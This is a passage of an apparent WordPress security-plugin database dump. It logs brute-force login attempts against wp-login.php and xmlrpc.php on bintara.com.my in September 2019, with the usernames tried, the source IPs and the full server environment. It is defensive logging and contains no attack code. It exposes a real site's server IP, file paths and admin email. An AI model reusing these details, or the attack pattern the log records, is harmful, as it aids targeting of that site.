18:53:10',18259000,19555848,'https://bintara.com.my/xmlrpc.php',1,0,'82.202.249.38'),(24229,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.146.230\";s:11:\"REMOTE_PORT\";s:5:\"48534\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-cBGShanGhHYaqyCSrHgAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568660484.3326\";s:12:\"REQUEST_TIME\";s:10:\"1568660484\";}}','notice','2019-09-16 19:01:25','2019-09-16 19:01:24',17742936,19233752,'https://bintara.com.my/wp-login.php',1,0,'132.148.146.230'),(24230,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.146.230\";s:11:\"REMOTE_PORT\";s:5:\"49334\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-cB2ShanGhHYaqyCSrIgAAABg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568660487.1862\";s:12:\"REQUEST_TIME\";s:10:\"1568660487\";}}','notice','2019-09-16 19:01:28','2019-09-16 19:01:27',18259176,19556640,'https://bintara.com.my/xmlrpc.php',1,0,'132.148.146.230'),(24231,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"202.92.6.144\";s:11:\"REMOTE_PORT\";s:5:\"46576\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-d8NK-omY048@iBsMR@wAAANA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568660976.4815\";s:12:\"REQUEST_TIME\";s:10:\"1568660976\";}}','notice','2019-09-16 19:09:38','2019-09-16 19:09:36',17747680,19232824,'https://bintara.com.my/wp-login.php',1,0,'202.92.6.144'),(24232,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"202.92.6.144\";s:11:\"REMOTE_PORT\";s:5:\"46576\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-d8NK-omY048@iBsMR@wAAANA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568660976.4815\";s:12:\"REQUEST_TIME\";s:10:\"1568660976\";}}','notice','2019-09-16 19:09:38','2019-09-16 19:09:36',17910400,19232824,'https://bintara.com.my/wp-login.php',1,0,'202.92.6.144'),(24233,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"202.92.6.144\";s:11:\"REMOTE_PORT\";s:5:\"47798\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-d87Ip53uPsY7BKAq76QAAAEg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568660979.3237\";s:12:\"REQUEST_TIME\";s:10:\"1568660979\";}}','notice','2019-09-16 19:09:40','2019-09-16 19:09:39',18260032,19558064,'https://bintara.com.my/xmlrpc.php',1,0,'202.92.6.144'),(24234,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"33180\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-fK2ShanGhHYaqyCSt4AAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568661291.8662\";s:12:\"REQUEST_TIME\";s:10:\"1568661291\";}}','notice','2019-09-16 19:14:53','2019-09-16 19:14:52',17741840,19232408,'https://bintara.com.my/wp-login.php',1,0,'162.144.134.39'),(24235,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.134.39\";s:11:\"REMOTE_PORT\";s:5:\"33660\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-fLg99C9j9bhK9Kpk1aAAAAQ8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568661294.9783\";s:12:\"REQUEST_TIME\";s:10:\"1568661294\";}}','notice','2019-09-16 19:14:56','2019-09-16 19:14:55',18259336,19556600,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.134.39'),(24236,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.180.123\";s:11:\"REMOTE_PORT\";s:5:\"45857\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-fwbIp53uPsY7BKAq8qwAAAEo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568661441.9607\";s:12:\"REQUEST_TIME\";s:10:\"1568661441\";}}','notice','2019-09-16 19:17:23','2019-09-16 19:17:22',17742936,19233752,'https://bintara.com.my/wp-login.php',1,0,'128.199.180.123'),(24237,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"128.199.180.123\";s:11:\"REMOTE_PORT\";s:5:\"46173\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX-fxGkPXSyJlCUJQmogZQAAAZQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568661444.468\";s:12:\"REQUEST_TIME\";s:10:\"1568661444\";}}','notice','2019-09-16 19:17:25','2019-09-16 